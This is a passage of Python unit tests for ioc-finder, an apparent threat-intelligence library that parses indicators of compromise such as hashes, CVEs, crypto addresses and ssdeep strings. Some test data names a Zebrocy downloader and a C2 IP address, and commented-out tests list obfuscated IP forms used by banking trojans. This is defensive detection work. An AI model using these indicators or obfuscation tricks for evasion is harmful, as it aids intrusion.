"https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 136 | iocs = find_iocs(s) 137 | assert iocs["sha256s"] == ["2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862"] 138 | 139 | # this was implemented for https://github.com/fhightower/ioc-finder/issues/87 140 | s = "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 141 | iocs = find_iocs(s, parse_from_url_path=False) 142 | assert iocs["sha256s"] == [] 143 | 144 | # this was implemented for https://github.com/fhightower/ioc-finder/issues/87 145 | s = "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 146 | iocs = find_iocs(s, parse_from_url_path=False, parse_urls_without_scheme=False) 147 | assert iocs["urls"] == [ 148 | "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 149 | ] 150 | assert iocs["sha256s"] == [] 151 | 152 | 153 | def test_file_hash_parsing(): 154 | s = "{} {} {} {} {}".format("A" * 32, "a" * 32, "b" * 40, "c" * 64, "d" * 128) 155 | iocs = find_iocs(s) 156 | assert len(iocs["md5s"]) == 1 157 | assert len(iocs["sha1s"]) == 1 158 | assert len(iocs["sha256s"]) == 1 159 | assert len(iocs["sha512s"]) == 1 160 | 161 | 162 | def test_cve_parsing(): 163 | s = "cve-2014-1000 cve 2014-1001 cve-1999-1002 CVE 2999-1003 CVE 1928-1004" 164 | iocs = find_iocs(s) 165 | assert len(iocs["cves"]) == 5 166 | assert "CVE-2014-1000" in iocs["cves"] 167 | assert "CVE-2014-1001" in iocs["cves"] 168 | assert "CVE-1999-1002" in iocs["cves"] 169 | assert "CVE-2999-1003" in iocs["cves"] 170 | assert "CVE-1928-1004" in iocs["cves"] 171 | 172 | 173 | def test_ipv4_cidr_parsing(): 174 | s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32" 175 | iocs = find_iocs(s) 176 | assert len(iocs["ipv4_cidrs"]) == 4 177 | assert "1.2.3.4/0" in iocs["ipv4_cidrs"] 178 | assert "1.2.3.4/10" in iocs["ipv4_cidrs"] 179 | assert "1.2.3.4/20" in iocs["ipv4_cidrs"] 180 | assert "1.2.3.4/32" in iocs["ipv4_cidrs"] 181 | 182 | s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32" 183 | iocs = find_iocs(s, parse_address_from_cidr=False) 184 | assert len(iocs["ipv4_cidrs"]) == 4 185 | assert len(iocs["ipv4s"]) == 0 186 | 187 | 188 | def test_registry_key_parsing(): 189 | s = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows HKLM\Software\Microsoft\Windows HKCC\Software\Microsoft\Windows" 190 | iocs = find_iocs(s) 191 | assert sorted( 192 | [ 193 | r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows", 194 | r"HKLM\Software\Microsoft\Windows", 195 | r"HKCC\Software\Microsoft\Windows", 196 | ] 197 | ) == sorted(iocs["registry_key_paths"]) 198 | 199 | 200 | def test_adsense_publisher_id_parsing(): 201 | s = "pub-1234567891234567" 202 | iocs = find_iocs(s) 203 | assert len(iocs["google_adsense_publisher_ids"]) == 1 204 | iocs["google_adsense_publisher_ids"][0] == "pub-1234567891234567" 205 | 206 | s = "pub-1234567891234567 pub-9383614236930773" 207 | iocs = find_iocs(s) 208 | assert len(iocs["google_adsense_publisher_ids"]) == 2 209 | assert "pub-1234567891234567" in iocs["google_adsense_publisher_ids"] 210 | assert "pub-9383614236930773" in iocs["google_adsense_publisher_ids"] 211 | 212 | 213 | def test_analytics_publisher_id_parsing(): 214 | s = "UA-000000-2" 215 | iocs = find_iocs(s) 216 | assert len(iocs["google_analytics_tracker_ids"]) == 1 217 | assert iocs["google_analytics_tracker_ids"][0] == "UA-000000-2" 218 | 219 | s = "UA-000000-2 UA-00000000-99" 220 | iocs = find_iocs(s) 221 | assert len(iocs["google_analytics_tracker_ids"]) == 2 222 | assert "UA-000000-2" in iocs["google_analytics_tracker_ids"] 223 | assert "UA-00000000-99" in iocs["google_analytics_tracker_ids"] 224 | 225 | 226 | def test_bitcoin_parsing(): 227 | s = """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2. 228 | P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy. 229 | Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""" 230 | iocs = find_iocs(s) 231 | assert len(iocs["bitcoin_addresses"]) == 3 232 | assert "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2" in iocs["bitcoin_addresses"] 233 | assert "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy" in iocs["bitcoin_addresses"] 234 | assert "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq" in iocs["bitcoin_addresses"] 235 | 236 | 237 | def test_xmpp_address_parsing(): 238 | s = """foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com""" 239 | iocs = find_iocs(s) 240 | assert len(iocs["xmpp_addresses"]) == 3 241 | assert "foo@swissjabber.de" in iocs["xmpp_addresses"] 242 | assert "bar@jabber.zone" in iocs["xmpp_addresses"] 243 | assert "bom@jabber.sow.as" in iocs["xmpp_addresses"] 244 | assert len(iocs["domains"]) == 4 245 | # make sure the xmpp addresses are not also parsed as email addresses 246 | assert len(iocs["email_addresses"]) == 1 247 | 248 | iocs = find_iocs(s, parse_domain_name_from_xmpp_address=False) 249 | assert len(iocs["xmpp_addresses"]) == 3 250 | assert "foo@swissjabber.de" in iocs["xmpp_addresses"] 251 | assert "bar@jabber.zone" in iocs["xmpp_addresses"] 252 | assert "bom@jabber.sow.as" in iocs["xmpp_addresses"] 253 | assert len(iocs["domains"]) == 1 254 | # make sure the xmpp addresses are not also parsed as email addresses 255 | assert len(iocs["email_addresses"]) == 1 256 | 257 | 258 | def test_mac_address_parsing(): 259 | s = "AA-F2-C9-A6-B3-4F AB:F2:C9:A6:B3:4F ACF2.C9A6.B34F" 260 | 261 | iocs = find_iocs(s) 262 | assert len(iocs["mac_addresses"]) == 3 263 | assert "AA-F2-C9-A6-B3-4F" in iocs["mac_addresses"] 264 | assert "AB:F2:C9:A6:B3:4F" in iocs["mac_addresses"] 265 | assert "ACF2.C9A6.B34F" in iocs["mac_addresses"] 266 | 267 | # same thing, just lower-case 268 | s = "aa-f2-c9-a6-b3-4f ab:f2:c9:a6:b3:4f acf2.c9a6.b34f" 269 | iocs = find_iocs(s) 270 | assert len(iocs["mac_addresses"]) == 3 271 | assert "aa-f2-c9-a6-b3-4f" in iocs["mac_addresses"] 272 | assert "ab:f2:c9:a6:b3:4f" in iocs["mac_addresses"] 273 | assert "acf2.c9a6.b34f" in iocs["mac_addresses"] 274 | 275 | 276 | def test_ssdeep_parsing(): 277 | s = "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 278 | iocs = find_iocs(s) 279 | assert len(iocs["ssdeeps"]) == 1 280 | assert iocs["ssdeeps"][0] == "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 281 | 282 | s = "ahdfadsfa 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,000/000/000000001 adfasf" 283 | iocs = find_iocs(s) 284 | assert len(iocs["ssdeeps"]) == 1 285 | assert iocs["ssdeeps"][0] == "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 286 | 287 | s = """c2b257868686c861d43c6cf3de146b8812778c8283f7d 288 | Threat Zepakab/Zebrocy Downloader 289 | ssdeep 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F""" 290 | iocs = find_iocs(s) 291 | assert len(iocs["ssdeeps"]) == 1 292 | assert iocs["ssdeeps"][0] == "12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F" 293 | 294 | s = """393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b,"000/000/000000001" 295 | 196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg,"000/000/000000002" 296 | 98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S,"000/000/000000003" 297 | 96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg,"000/000/000000004" 298 | 196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax,"000/000/000000005" 299 | 1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6,"000/000/000000006" 300 | 48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ,"000/000/000000007" 301 | 24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ,"000/000/000000008" 302 | 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,"000/000/000000009""" 303 | iocs = find_iocs(s) 304 | assert len(iocs["ssdeeps"]) == 9 305 | assert ( 306 | "393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b" 307 | in iocs["ssdeeps"] 308 | ) 309 | assert "196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg" in iocs["ssdeeps"] 310 | assert ( 311 | "98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S" 312 | in iocs["ssdeeps"] 313 | ) 314 | assert "96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg" in iocs["ssdeeps"] 315 | assert ( 316 | "196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax" in iocs["ssdeeps"] 317 | ) 318 | assert ( 319 | "1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6" 320 | in iocs["ssdeeps"] 321 | ) 322 | assert ( 323 | "48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ" in iocs["ssdeeps"] 324 | ) 325 | assert ( 326 | "24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ" 327 | in iocs["ssdeeps"] 328 | ) 329 | assert "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" in iocs["ssdeeps"] 330 | 331 | 332 | def test_imphash_parsing(): 333 | names = ["imphash", "import hash"] 334 | templates = [ 335 | """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a 336 | Dropper {}: 18ddf28a71089acdbab5038f58044c0a 337 | C2 IP: 210.209.127.8:443""", 338 | "{}: 18ddf28a71089acdbab5038f58044c0a", 339 | "{} 18ddf28a71089acdbab5038f58044c0a", 340 | "{} 18ddf28a71089acdbab5038f58044c0a", 341 | "{}: 18ddf28a71089acdbab5038f58044c0a", 342 | "{}\t18ddf28a71089acdbab5038f58044c0a", 343 | "{}\n18ddf28a71089acdbab5038f58044c0a", 344 | "{} - 18ddf28a71089acdbab5038f58044c0a", 345 | ] 346 | 347 | for template in templates: 348 | for name in names: 349 | print(template) 350 | iocs = find_iocs(template.format(name)) 351 | assert len(iocs["imphashes"]) == 1 352 | assert iocs["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"] 353 | assert len(iocs["md5s"]) == 0 354 | 355 | iocs = find_iocs(template.format(name.upper())) 356 | assert len(iocs["imphashes"]) == 1 357 | assert iocs["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"] 358 | assert len(iocs["md5s"]) == 0 359 | 360 | 361 | def test_authentihash(): 362 | names = ["authentihash"] 363 | templates = [ 364 | "{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 365 | "{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 366 | "{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 367 | "{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 368 | "{} - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 369 | "{}-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 370 | "{}\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 371 | "{}\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 372 | ] 373 | 374 | for template in templates: 375 | for name in names: 376 | print(template) 377 | iocs = find_iocs(template.format(name)) 378 | assert len(iocs["authentihashes"]) == 1 379 | assert iocs["authentihashes"] == ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"] 380 | assert len(iocs["sha256s"]) == 0 381 | 382 | iocs = find_iocs(template.format(name.upper())) 383 | assert len(iocs["authentihashes"]) == 1 384 | assert iocs["authentihashes"] == ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"] 385 | assert len(iocs["sha256s"]) == 0 386 | 387 | 388 | def test_user_agents(): 389 | s = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" 390 | iocs = find_iocs(s) 391 | assert len(iocs["user_agents"]) == 1 392 | assert iocs["user_agents"] == ["Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"] 393 | 394 | s = "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11 mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0" 395 | iocs = find_iocs(s) 396 | assert len(iocs["user_agents"]) == 2 397 | assert ( 398 | "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11" 399 | in iocs["user_agents"] 400 | ) 401 | assert "mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0" in iocs["user_agents"] 402 | 403 | # test the same thing as above but with different casing to make sure the cases are matched and maintained properly 404 | s = "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11 Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0" 405 | iocs = find_iocs(s) 406 | assert len(iocs["user_agents"]) == 2 407 | assert ( 408 | "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11" 409 | in iocs["user_agents"] 410 | ) 411 | assert "Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0" in iocs["user_agents"] 412 | 413 | 414 | def test_monero_addresses(): 415 | result = find_iocs( 416 | "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp" 417 | ) 418 | assert result["monero_addresses"] == [ 419 | "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp" 420 | ] 421 | 422 | s = "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh" 423 | result = find_iocs(s) 424 | assert ( 425 | "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk" 426 | in result["monero_addresses"] 427 | ) 428 | assert ( 429 | "498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh" 430 | in result["monero_addresses"] 431 | ) 432 | -------------------------------------------------------------------------------- /tests/test_odd_ip_address_formats.py: -------------------------------------------------------------------------------- 1 | # from ioc_finder import find_iocs 2 | 3 | 4 | # def test_leading_zero(): 5 | # """Sections of IP addresses that start with a leading zero should be interpreted as being in base 8.""" 6 | # s = '0177.0.0.01' 7 | # results = find_iocs(s) 8 | # assert results['ipv4s'] == ['127.0.0.1'] 9 | 10 | # s = '226.000.000.037' 11 | # results = find_iocs(s) 12 | # assert results['ipv4s'] == ['226.0.0.31'] 13 | 14 | # s = '014.0.0.01' 15 | # results = find_iocs(s) 16 | # assert results['ipv4s'] == ['12.0.0.1'] 17 | 18 | # # because `018` (the first section of the ip below) is not a valid octal number, it should not be converted 19 | # s = '018.0.0.01' 20 | # results = find_iocs(s) 21 | # assert results['ipv4s'] == ['18.0.0.1'] 22 | 23 | 24 | # def test_a_b_c_format(): 25 | # results = find_iocs('111.111.1111') 26 | # assert results['ipv4s'] == ['111.111.4.87'] 27 | 28 | # results = find_iocs('10.0.514') 29 | # assert results['ipv4s'] == ['10.0.2.2'] 30 | 31 | # # here is some code to show how sections c and d of dotted decimal form are calculated from the given examples: 32 | # # x = 1111 33 | # # print(f'{x // 256}.{(x - 256) % 256}') 34 | 35 | 36 | # def test_a_b_format(): 37 | # results = find_iocs('1.300') 38 | # assert results['ipv4s'] == ['1.0.1.44'] 39 | 40 | # results = find_iocs('1.256') 41 | # assert results['ipv4s'] == ['1.0.1.0'] 42 | 43 | # results = find_iocs('1.15') 44 | # assert results['ipv4s'] == ['1.0.0.15'] 45 | 46 | # results = find_iocs('1.65793') 47 | # assert results['ipv4s'] == ['1.1.1.1'] 48 | 49 | # results = find_iocs('1.67794') 50 | # assert results['ipv4s'] == ['1.1.8.210'] 51 | 52 | 53 | # def test_numeric_forms(): 54 | # # these examples are from: https://bugzilla.mozilla.org/show_bug.cgi?id=67730 55 | 56 | # s = 'http://3486011863' 57 | # results = find_iocs(s) 58 | # assert results['ipv4s'] == ['207.200.81.215'] 59 | 60 | # s = 'http://00000000317.00000000310.00000000121.00000000327/' 61 | # results = find_iocs(s) 62 | # assert results['ipv4s'] == ['207.200.81.215'] 63 | 64 | # s = 'http://4294967503.4294967496.4294967377.4294967511/' 65 | # results = find_iocs(s) 66 | # assert results['ipv4s'] == ['207.200.81.215'] 67 | 68 | 69 | # def test_real_obfuscated_forms(): 70 | # # these examples come from: https://securelist.com/new-brazilian-banking-trojans-recycle-old-url-obfuscation-tricks/29558/ 71 | 72 | # s = 'http://0x42.0x66.0x0d.0x63' 73 | # results = find_iocs(s) 74 | # assert results['ipv4s'] == ['66.102.13.99'] 75 | 76 | # s = 'http://0x42660d63' 77 | # results = find_iocs(s) 78 | # assert results['ipv4s'] == ['66.102.13.99'] 79 | 80 | # s = 'http://1113984355' 81 | # results = find_iocs(s) 82 | # assert results['ipv4s'] == ['66.102.13.99'] 83 | 84 | # s = 'http://00000102.00000146.00000015.00000143' 85 | # results = find_iocs(s) 86 | # assert results['ipv4s'] == ['66.102.13.99'] 87 | -------------------------------------------------------------------------------- /tests/test_parsing_functions.py: -------------------------------------------------------------------------------- 1 | """Make sure that the parsing functions for specific functions are imported properly.""" 2 | 3 | from ioc_finder import parse_urls 4 | 5 | 6 | def test_url_parsing_func(): 7 | results = parse_urls("https://google.com") 8 | assert results == ["https://google.com"] 9 | -------------------------------------------------------------------------------- /tests/test_urls.py: -------------------------------------------------------------------------------- 1 | """Test the URL parsing against the urls here: https://mathiasbynens.be/demo/url-regex.""" 2 | 3 | from d8s_lists import iterables_have_same_items 4 | 5 | from ioc_finder import find_iocs 6 | 7 | # VALID_URLS = [ 8 | # 'http://foo.com/blah_blah', 9 | # 'http://foo.com/blah_blah/', 10 | # 'http://foo.com/blah_blah_(wikipedia)', 11 | # 'http://foo.com/blah_blah_(wikipedia)_(again)', 12 | # 'http://www.example.com/wpstyle/?p=364', 13 | # 'https://www.example.com/foo/?bar=baz&inga=42&quux', 14 | # 'http://✪df.ws/123', 15 | # 'http://userid:password@example.com:8080', 16 | # 'http://userid:password@example.com:8080/', 17 | # 'http://userid@example.com', 18 | # 'http://userid@example.com/', 19 | # 'http://userid@example.com:8080', 20 | # 'http://userid@example.com:8080/', 21 | # 'http://userid:password@example.com', 22 | # 'http://userid:password@example.com/', 23 | # 'http://142.42.1.1/', 24 | # 'http://142.42.1.1:8080/', 25 | # 'http://➡.ws/䨹', 26 | # 'http://⌘.ws', 27 | # 'http://⌘.ws/', 28 | # 'http://foo.com/blah_(wikipedia)#cite-1', 29 | # 'http://foo.com/blah_(wikipedia)_blah#cite-1', 30 | # 'http://foo.com/unicode_(✪)_in_parens', 31 | # 'http://foo.com/(something)?after=parens', 32 | # 'http://☺.damowmow.com/', 33 | # 'http://code.google.com/events/#&product=browser', 34 | # 'http://j.mp', 35 | # 'ftp://foo.bar/baz', 36 | # 'http://foo.bar/?q=Test%20URL-encoded%20stuff', 37 | # 'http://مثال.إختبار', 38 | # 'http://例子.测试', 39 | # 'http://उदाहरण.परीक्षा', 40 | # "http://-.~_!$&'()*+,;=:%40:80%2f::::::@example.com", 41 | # 'http://1337.net', 42 | # 'http://a.b-c.de', 43 | # 'http://223.255.255.254', 44 | # ] 45 | 46 | 47 | # def test_url_parsing(): 48 | # for url in VALID_URLS: 49 | # iocs = find_iocs(url) 50 | # try: 51 | # assert len(iocs['urls']) == 1 52 | # assert iocs['urls'][0] == url 53 | # except AssertionError as e: 54 | # print('failed on url: {}'.format(url)) 55 | # raise e 56 | 57 | 58 | # INVALID_URLS = [ 59 | # 'http://', 60 | # 'http://.', 61 | # 'http://..', 62 | # 'http://../', 63 | # 'http://?', 64 | # 'http://??', 65 | # 'http://??/', 66 | # 'http://#', 67 | # 'http://##', 68 | # 'http://##/', 69 | # '//', 70 | # '//a', 71 | # '///a', 72 | # '///', 73 | # 'http:///a', 74 | # 'foo.com', 75 | # 'rdar://1234', 76 | # 'h://test', 77 | # ':// should fail', 78 | # 'ftps://foo.bar/', 79 | # 'http://-error-.invalid/', 80 | # 'http://a.b--c.de/', 81 | # 'http://-a.b.co', 82 | # 'http://a.b-.co', 83 | # 'http://0.0.0.0', 84 | # 'http://10.1.1.0', 85 | # 'http://10.1.1.255', 86 | # 'http://224.1.1.1', 87 | # 'http://1.1.1.1.1', 88 | # 'http://123.123.123', 89 | # 'http://3628126748', 90 | # 'http://.www.foo.bar/', 91 | # 'http://www.foo.bar./', 92 | # 'http://.www.foo.bar./', 93 | # 'http://10.1.1.1', 94 | # ] 95 | 96 | 97 | # def test_invalid_urls(): 98 | # for url in INVALID_URLS: 99 | # iocs = find_iocs(url) 100 | # assert len(iocs['urls']) == 0 101 | 102 | 103 | def test_cidr_ranges_not_found_as_urls(): 104 | """See https://github.com/fhightower/ioc-finder/issues/91.""" 105 | result = find_iocs("1.1.1.1/0") 106 | assert result["urls"] == [] 107 | 108 | result = find_iocs("1.1.1.1/0", parse_urls_without_scheme=False) 109 | assert result["urls"] == [] 110 | 111 | result = find_iocs("1.1.1.1/0 foobar.com/test/bingo.php") 112 | assert result["urls"] == ["foobar.com/test/bingo.php"] 113 | 114 | 115 | def test_parse_domain_from_url_not_removing_entire_url(): 116 | """See https://github.com/fhightower/ioc-finder/issues/90.""" 117 | # default behaviour 118 | result = find_iocs("https://foobar.com/test/bingo.com/bar") 119 | assert iterables_have_same_items(result["domains"], ["foobar.com", "bingo.com"]) 120 | 121 | result = find_iocs("https://foobar.com/test/bingo.com/bar", parse_domain_from_url=False) 122 | assert result["domains"] == ["bingo.com"] 123 | 124 | result = find_iocs("https://foobar.com/test/bingo.com/bar", parse_domain_from_url=False, parse_from_url_path=False) 125 | assert result["domains"] == [] 126 | 127 | 128 | def test_issue_104__encoded_url_properly_parsed(): 129 | s = "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip" 130 | result = find_iocs(s) 131 | assert result["urls"] == [ 132 | "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip" 133 | ] 134 | 135 | 136 | def test_url__percent_encoded_path(): 137 | # make sure a percent encoded path is properly removed so that nothing is parsed from it 138 | s = "https://example.com/test%20page/foo.com/bingo.php?q=bar.com" 139 | result = find_iocs(s, parse_from_url_path=False) 140 | assert result["urls"] == ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"] 141 | assert iterables_have_same_items( 142 | result["domains"], ["example.com", "bar.com"] 143 | ) # the key here is that "foo.com" is not parsed because it is part of the path (which has been removed) 144 | assert result["file_paths"] == [] 145 | -------------------------------------------------------------------------------- /tests/test_utility_functions.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from ioc_finder.ioc_grammars import hasBothOrNeitherAngleBrackets, hasMultipleConsecutiveSpaces 4 | 5 | 6 | def test_hasBothOrNeitherAngleBrackets_1(): 7 | assert hasBothOrNeitherAngleBrackets("<>") 8 | assert hasBothOrNeitherAngleBrackets("") 9 | assert hasBothOrNeitherAngleBrackets("< foo >") 10 | assert hasBothOrNeitherAngleBrackets("foo") 11 | 12 | assert not hasBothOrNeitherAngleBrackets("<") 13 | assert not hasBothOrNeitherAngleBrackets("") 17 | assert not hasBothOrNeitherAngleBrackets(">foo") 18 | assert not hasBothOrNeitherAngleBrackets("foo>") 19 | assert not hasBothOrNeitherAngleBrackets(">foo>") 20 | 21 | 22 | def test_hasMultipleConsecutiveSpaces_1(): 23 | assert not hasMultipleConsecutiveSpaces("") 24 | assert not hasMultipleConsecutiveSpaces(" ") 25 | assert hasMultipleConsecutiveSpaces(" ") 26 | assert hasMultipleConsecutiveSpaces(" ") 27 | -------------------------------------------------------------------------------- /tests/test_with_hypothesis.py: -------------------------------------------------------------------------------- 1 | """Using hypothesis (https://hypothesis.readthedocs.io/en/latest/index.html) to test the finder.""" 2 | 3 | from hypothesis import given, settings 4 | from hypothesis.provisional import domains, urls 5 | from hypothesis.strategies._internal.ipaddress import ip_addresses 6 | 7 | from ioc_finder import find_iocs 8 | 9 | # @given(urls()) 10 | # @settings(deadline=None) 11 | # def test_url_parsing(url): 12 | # url = url.lower() 13 | # iocs = find_iocs(url) 14 | # failure = False 15 | 16 | # try: 17 | # assert len(iocs['urls']) == 1 18 | # assert iocs['urls'][0] == url 19 | # except AssertionError as e: 20 | # failure = True 21 | # print('Failed on url: {}'.format(url)) 22 | 23 | # if failure: 24 | # raise AssertionError('Error parsing urls') 25 | 26 | 27 | # @given(domains()) 28 | # @settings(deadline=None) 29 | # def test_domain_parsing(domain): 30 | # domain = domain.lower() 31 | # iocs = find_iocs(domain) 32 | # failure = False 33 | 34 | # try: 35 | # assert len(iocs['domains']) == 1 36 | # assert iocs['domains'][0] == domain 37 | # except AssertionError as e: 38 | # failure = True 39 | # print('Failed on domain: {}'.format(domain)) 40 | 41 | # if failure: 42 | # raise AssertionError('Error parsing domains') 43 | 44 | 45 | # @given(ip_addresses(v=4)) 46 | # @settings(deadline=None) 47 | # def test_ipv4_parsing(ipv4): 48 | # iocs = find_iocs(ipv4) 49 | # failure 